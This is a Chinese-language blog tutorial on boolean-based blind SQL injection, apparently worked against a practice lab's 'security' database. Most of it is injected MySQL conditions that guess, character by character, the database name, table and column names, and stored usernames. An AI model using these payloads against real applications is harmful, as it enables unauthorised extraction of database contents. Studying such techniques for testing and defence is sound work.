





  • ascii()
  • length()
  • left()
  • substr()


  • 求当前数据库的数据库名长度

      -- length 返回长度
      -- 8是当前数据库'security'的长度
      SELECT * from users WHERE id = 1 and (length(database())=8)
      -- 也可以使用 > 、< 符号来进一步缩小范围
      SELECT * from users WHERE id = 1 and (length(database())>8)
      -- 当长度正确就页面就显示正常,其余页面则显示错误
      -- substr 返回子字符串
      -- 8是当前数据库'security'的长度 ,从第8个开始,取1位,则是'r'
      -- 如果pos为9 那么开始位置大于字符串长度,ascii函数处理后将变成false
      -- and 后只要不为 0, 页面都会返回正常
      SELECT * from users WHERE id = 1 and ascii(substr(database(),8,1))
  • 求当前数据库名

      -- 从左至右截取一个字符
      SELECT * from users WHERE id = 1 and (left(database(),1)='s')
      -- 从左只有截取两个字符
      SELECT * from users WHERE id = 1 and (left(database(),2)='se')
      SELECT * from users WHERE id = 1 AND (ASCII(SUBSTR(database(),1,1)) = 115)
      SELECT * from users WHERE id = 1 AND (ASCII(SUBSTR(database(),2,1)) = 101)
  • 求当前数据库中表的个数

      SELECT * from users WHERE id = 1 AND 
      (select count(table_name) from information_schema.`TABLES` where table_schema = database()) = 4
  • 求当前数据库表的表名长度

      -- length
      SELECT * from users WHERE id = 1 
      AND (LENGTH((select table_name from information_schema.`TABLES` where table_schema = database() LIMIT 0,1))) = 6
      -- substr
      SELECT * from users WHERE id = 1 
      AND ASCII(SUBSTR((select table_name FROM information_schema.`TABLES` where table_schema = database() LIMIT 0,1),6,1))
  • 求当前数据库表的表名

      SELECT * from users WHERE id = 1 
      AND ASCII(SUBSTR((select table_name FROM information_schema.`TABLES` where table_schema = database() LIMIT 0,1),1,1)) = 101 -- e
      SELECT * from users WHERE id = 1 
      AND ASCII(SUBSTR((select table_name FROM information_schema.`TABLES` where table_schema = database() LIMIT 0,1),2,1)) = 109 -- m
  • 求指定表中列的数量

      SELECT * from users WHERE id = 1 
      AND (select count(column_name) from information_schema.columns where table_name = "users") = 3
  • 求指定表中列的长度

      SELECT * from users WHERE id = 1 
      AND ASCII(SUBSTR((select column_name from information_schema.columns where table_name = "users" limit 0,1),2,1))
  • 求指定表中的列名

      SELECT * from users WHERE id = 1 
      AND ASCII(SUBSTR((select column_name from information_schema.columns where table_name = "users" limit 0,1),1,1)) = 105
  • 求指定表中某字段的数量

      SELECT * from users WHERE id = 1 
      AND (select count(username) from users) = 13
  • 求字段长度

      SELECT * from users WHERE id = 1 
      AND ASCII(SUBSTR((select username from users  limit 0,1),4,1))
  • 求字段名

      SELECT * from users WHERE id = 1 
      AND ASCII(SUBSTR((select username from users  limit 0,1),1,1))  = 68


由于猜解后端信息需要执行大量的SQL注入语句,因此我们常常编写脚本自动完成这一重复性工作,例如一个用以参考的注入脚本,或者SQLMAP一把梭 :P

  • Title: 布尔注入与脚本自动化的简单实现
  • Author: 7erry
  • Created at : 2023-07-23 00:00:00
  • Updated at : 2023-07-23 00:00:00
  • Link: http://7erry.com/2023/07/23/布尔注入与脚本自动化的简单实现/
  • License: This work is licensed under CC BY-NC 4.0.
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